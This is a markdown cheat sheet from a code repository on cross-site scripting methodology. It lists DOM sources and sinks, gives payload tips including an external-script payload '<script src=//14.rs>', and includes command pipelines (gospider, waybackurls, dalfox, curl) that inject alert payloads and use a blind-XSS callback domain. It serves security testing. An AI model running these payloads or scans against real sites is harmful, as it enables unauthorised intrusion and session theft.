Skip to content

Latest commit

 

History

History
99 lines (86 loc) · 3.2 KB

xss.md

File metadata and controls

99 lines (86 loc) · 3.2 KB

XSS Methodology


Manual approach

  • Sources
document.URL
document.documentURI
document.URLUnencoded (IE 5.5 or later Only)
document.baseURI
location
location.href
location.search
location.hash
location.pathname
document.cookie
document.referrer
window.name
history.pushState()
history.replaceState()
localStorage
sessionStorage
  • Sinks
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto.generateCRMFRequest
ScriptElement.src
ScriptElement.text
ScriptElement.textContent
ScriptElement.innerText
anyTag.onEventName
document.write
document.writeln
anyElement.innerHTML
Range.createContextualFragment
window.location
document.location
  • Q: How to identify sinks and sources?

  • A: Use the browser extension Untrusted Types by filedescriptor.

  • Tips and Tricks @s0md3v

    • http(s):// can be shortened to // or /\ or \.
    • document.cookie can be shortened to cookie. It applies to other DOM objects as well.
    • alert and other pop-up functions don't need a value, so stop doing alert('XSS') and start doing alert()
    • You can use // to close a tag instead of >.
    • I have found that confirm is the least detected pop-up function so stop using alert.
    • Quotes around attribute value aren't necessary as long as it doesn't contain spaces. You can use <script src=//14.rs> instead of <script src="//14.rs">
    • The shortest HTML context XSS payload is <script src=//14.rs> (19 chars)

Automated approach

  • Scanning XSS from host / from @cihanmehmet
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt
  • Automating XSS using Dalfox, Gf and Waybackurls / from @theinfosecguy
cat test.txt | gf xss | sed ‘s/=.*/=/’ | sed ‘s/URL: //’ | tee testxss.txt ; dalfox file testxss.txt -b yours-xss-hunter-domain(e.g yours.xss.ht)
  • XSS without Gf / from @HacktifyS
waybackurls testphp.vulnweb.com| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

Resources